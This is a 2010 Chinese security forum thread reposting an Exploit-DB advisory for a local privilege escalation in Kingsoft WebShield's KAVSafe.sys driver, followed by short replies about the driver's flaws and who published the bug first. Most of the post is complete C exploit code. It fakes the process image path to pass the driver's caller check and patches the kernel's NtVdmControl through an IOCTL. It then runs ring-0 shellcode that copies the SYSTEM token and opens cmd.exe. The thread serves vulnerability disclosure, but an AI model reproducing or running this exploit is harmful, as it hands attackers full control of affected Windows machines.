首页
社区
课程
招聘
[转帖]Kingsoft WebShield KAVSafe.sys Kernel Mode Local Priv. Escalation
发表于: 2010-5-24 08:58 7660

[转帖]Kingsoft WebShield KAVSafe.sys Kernel Mode Local Priv. Escalation

2010-5-24 08:58
7660
http://sebug.net/vulndb/19676/
# Title: Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Priv. Escalation
# EDB-ID: 12710
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Xuanyuan Smart
# Published: 2010-05-23
# Verified: no
# Download Exploit Code
# Download N/A

view sourceprint?Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability  

   

VULNERABLE PRODUCTS   

Kingsoft WebShield <= 3.5.1.2 (2010.5.23)  

   

Signature Date: 2010-5-23 2:33:54  

   

And  

   

KAVSafe.sys <= 2010.4.14.609  

Signature Date:2010-4-14 13:42:26  

   

DETAILS:  

Kavsafe.sys create a device called \Device\KAVSafe , and handles DeviceIoControl request IoControlCode = 0x830020d4 , which can overwrite arbitrary kernel module data  

   

EXPLOIT CODE:  

#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)  

typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(  

  HANDLE ProcessHandle,  

  DWORD ProcessInformationClass,  

  PVOID ProcessInformation,  

  ULONG ProcessInformationLength,  

  PULONG ReturnLength  

    );  

   

typedef struct _STRING {  

    USHORT Length;  

    USHORT MaximumLength;  

    PCHAR Buffer;  

} STRING;  

typedef STRING *PSTRING;  

typedef struct _RTL_DRIVE_LETTER_CURDIR {  

    USHORT Flags;  

    USHORT Length;  

    ULONG TimeStamp;  

    STRING DosPath;  

} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;  

typedef struct _UNICODE_STRING {  

    USHORT Length;  

    USHORT MaximumLength;  

    PWSTR  Buffer;  

} UNICODE_STRING;  

typedef UNICODE_STRING *PUNICODE_STRING;  

typedef const UNICODE_STRING *PCUNICODE_STRING;  

#define RTL_MAX_DRIVE_LETTERS 32  

#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001  

typedef struct _CURDIR {  

    UNICODE_STRING DosPath;  

    HANDLE Handle;  

} CURDIR, *PCURDIR;  

typedef struct _RTL_USER_PROCESS_PARAMETERS {  

    ULONG MaximumLength;  

    ULONG Length;  

    ULONG Flags;  

    ULONG DebugFlags;  

    HANDLE ConsoleHandle;  

    ULONG  ConsoleFlags;  

    HANDLE StandardInput;  

    HANDLE StandardOutput;  

    HANDLE StandardError;  

    CURDIR CurrentDirectory;        // ProcessParameters  

    UNICODE_STRING DllPath;         // ProcessParameters  

    UNICODE_STRING ImagePathName;   // ProcessParameters  

    UNICODE_STRING CommandLine;     // ProcessParameters  

    PVOID Environment;              // NtAllocateVirtualMemory  

    ULONG StartingX;  

    ULONG StartingY;  

    ULONG CountX;  

    ULONG CountY;  

    ULONG CountCharsX;  

    ULONG CountCharsY;  

    ULONG FillAttribute;  

    ULONG WindowFlags;  

    ULONG ShowWindowFlags;  

    UNICODE_STRING WindowTitle;     // ProcessParameters  

    UNICODE_STRING DesktopInfo;     // ProcessParameters  

    UNICODE_STRING ShellInfo;       // ProcessParameters  

    UNICODE_STRING RuntimeData;     // ProcessParameters  

    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ];  

} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;  

typedef struct _PEB {  

    BOOLEAN InheritedAddressSpace;      // These four fields cannot change unless the  

    BOOLEAN ReadImageFileExecOptions;   //  

    BOOLEAN BeingDebugged;              //  

    BOOLEAN SpareBool;                  //  

    HANDLE Mutant;                      // INITIAL_PEB structure is also updated.  

    PVOID ImageBaseAddress;  

    PVOID Ldr;  

    struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;  

} PEB, *PPEB;  

typedef LONG KPRIORITY;  

typedef struct _PROCESS_BASIC_INFORMATION {  

    LONG ExitStatus;  

    PVOID PebBaseAddress;  

    ULONG_PTR AffinityMask;  

    KPRIORITY BasePriority;  

    ULONG_PTR UniqueProcessId;  

    ULONG_PTR InheritedFromUniqueProcessId;  

} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;  

typedef struct {  

    ULONG   Unknown1;  

    ULONG   Unknown2;  

    PVOID   Base;  

    ULONG   Size;  

    ULONG   Flags;  

    USHORT  Index;  

    USHORT  NameLength;  

    USHORT  LoadCount;  

    USHORT  PathLength;  

    CHAR    ImageName[256];  

} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;  

   

typedef struct {  

    ULONG   Count;  

    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];  

} X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION;  

typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) (  

   LONG SystemInformationClass,  

 PVOID SystemInformation,  

   ULONG SystemInformationLength,  

   PULONG ReturnLength  

    );  

   

#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )  

typedef LONG (WINAPI *PNT_VDM_CONTROL) (  

   ULONG Service,  

   PVOID ServiceData  

    );  

VOID __declspec(naked) R0ShellCodeXP()  

{  

__asm  

{  

mov eax,0xffdff124  

mov eax,[eax]  

mov esi ,dword ptr[eax+0x220]  

mov eax,esi  

searchxp:  

mov eax,dword ptr[eax+0x88]  

sub eax,0x88  

mov edx,dword ptr[eax+0x84]  

cmp edx,4  

jnz searchxp  

mov eax,dword ptr[eax+0xc8]  

mov dword ptr[esi + 0xc8] , eax  

ret 8   

}  

}  

VOID NopNop()  

{  

printf("nop!\n");  

}  

   

#include "malloc.h"  

int main(int argc, char* argv[])  

{  

   

printf("KSWebShield KAVSafe.sys <= 2010,04,14,609\n" 

"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n" 

"2010-5-23\n" 

"By Lincoin \n\nPress Enter");  

HKEY hkey ;   

WCHAR InstallPath[MAX_PATH];  

DWORD datatype ;   

DWORD datasize = MAX_PATH * sizeof(WCHAR);  

ULONG oldlen ;  

PVOID pOldBufferData = NULL ;   

   

if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS)  

{  

if (RegQueryValueExW(hkey , L"ProgramPath" , NULL , &datatype , (LPBYTE)InstallPath , &datasize) != ERROR_SUCCESS)  

{  

RegCloseKey(hkey);  

printf("KSWebShield not installed\n");  

getchar();  

return 0 ;  

}  

   

RegCloseKey(hkey);  

}  

else 

{  

printf("KSWebShield not installed\n");  

getchar();  

return 0 ;  

}  

wcscat(InstallPath , L"\\kavinst.exe");  

   

   

PROCESS_BASIC_INFORMATION pbi ;   

   

PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess ;  

pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryInformationProcess");  

pNtQueryInformationProcess(NtCurrentProcess() , 0 , &pbi , sizeof(pbi) , NULL);  

   

PPEB peb ;   

   

peb = (PPEB)pbi.PebBaseAddress;  

oldlen = peb->ProcessParameters->ImagePathName.Length;  

peb->ProcessParameters->ImagePathName.Length = wcslen(InstallPath) * sizeof(WCHAR);  

pOldBufferData = malloc(peb->ProcessParameters->ImagePathName.Length);  

RtlCopyMemory(pOldBufferData,peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length);  

RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , InstallPath ,peb->ProcessParameters->ImagePathName.Length );  

HANDLE hdev = CreateFile("\\\\.\\KAVSafe" ,   

FILE_READ_ATTRIBUTES ,   

FILE_SHARE_READ ,   

0,  

OPEN_EXISTING ,   

0,  

0);  

   

if (hdev==INVALID_HANDLE_VALUE)  

{  

printf("cannot open device %u\n", GetLastError());  

getchar();  

return 0 ;   

}  

RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , pOldBufferData,peb->ProcessParameters->ImagePathName.Length);  

peb->ProcessParameters->ImagePathName.Length = (USHORT)oldlen ;   

   

PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation  ;  

pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQuerySystemInformation");  

X_SYSTEM_MODULE_INFORMATION sysmod ;   

HMODULE KernelHandle ;   

   

pNtQuerySystemInformation(0xb, &sysmod, sizeof(sysmod), NULL);  

    KernelHandle = LoadLibrary(strrchr(sysmod.Module[0].ImageName, '\\') + 1);  

if (KernelHandle == 0 )  

{  

printf("cannot load ntoskrnl!\n");  

getchar();  

return 0 ;   

}  

PVOID pNtVdmControl = GetProcAddress(KernelHandle , "NtVdmControl");  

   

if (pNtVdmControl == 0 )  

{  

printf("cannot find NtVdmControl!\n");  

getchar();  

return 0 ;   

}  

pNtVdmControl = (PVOID)((ULONG)pNtVdmControl - (ULONG)KernelHandle  );  

   

printf("NtVdmControl = %08x" , pNtVdmControl );  

getchar();  

ULONG ShellCodeSize = (ULONG)NopNop - (ULONG)R0ShellCodeXP;  

ULONG pShellCode = (ULONG)R0ShellCodeXP;   

   

   

PVOID Data = malloc(0x48 + ShellCodeSize);  

   

CopyMemory((PVOID)((ULONG)Data + 0x48) , R0ShellCodeXP , ShellCodeSize);  

CHAR ModuleName[68]= "ntoskrnl.exe" ;   

RtlCopyMemory( Data , ModuleName , sizeof(ModuleName));  

*(ULONG*)((ULONG)Data + 64) = (ULONG)pNtVdmControl;  

*(ULONG*)((ULONG)Data + 68) = ShellCodeSize ;  

ULONG btr ;   

if (!DeviceIoControl(hdev ,  

IOCTL_HOTPATCH_KERNEL_MODULE ,   

Data ,   

0x48 + ShellCodeSize ,   

NULL ,   

0,  

&btr , 0   

))  

{  

printf("cannot device io control!%u\n" , GetLastError());  

getchar();  

return 0;  

}  

   

CloseHandle(hdev);  

   

PNT_VDM_CONTROL pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtVdmControl");  

pR3NtVdmControl(0,0);  

WinExec("cmd.exe" , SW_SHOW);  

printf("OK!\n ");  

   

getchar();  

   

return 0;   

}  

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (5)
雪    币: 722
活跃值: (123)
能力值: ( LV12,RANK:300 )
在线值:
发帖
回帖
粉丝
2
昨天看到了。我只能说金山判断是否可信调用者的方式比较囧……
另外KAVSafe.sys居然是check版的,DbgPrint都还在的,这个也比较囧……
另外这个驱动实际上是毒霸的驱动直接拿过来了,看pdb路径就知道……
2010-5-24 12:51
0
雪    币: 50
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
哎,这个漏洞其实是我昨天在看雪首发的,杯具的是看雪的老大们太和谐了。

今天SEBUG,EXPLOIT-DB,INT03全都发了,中国论坛真的不行
2010-5-24 13:53
0
雪    币: 722
活跃值: (123)
能力值: ( LV12,RANK:300 )
在线值:
发帖
回帖
粉丝
4
声明,这个Xuanyuan Smart不是我
有不只一个人问是不是我,看起来这个名字似乎很“疑似”,连邮箱yicong2010_at_yahoo.com也很“疑似”(我的雅虎邮箱是yicong2007_at_yahoo.com.cn),不知道是不是故意的。但是确实不是我。
2010-5-24 20:29
0
雪    币: 170
活跃值: (90)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
5
有人看上你了 小心
2010-5-24 21:09
0
雪    币: 622
活跃值: (65)
能力值: ( LV13,RANK:290 )
在线值:
发帖
回帖
粉丝
6
有了漏洞就补上呗,老整些没用的。
2010-5-24 21:29
0
游客
登录 | 注册 方可回帖
返回
//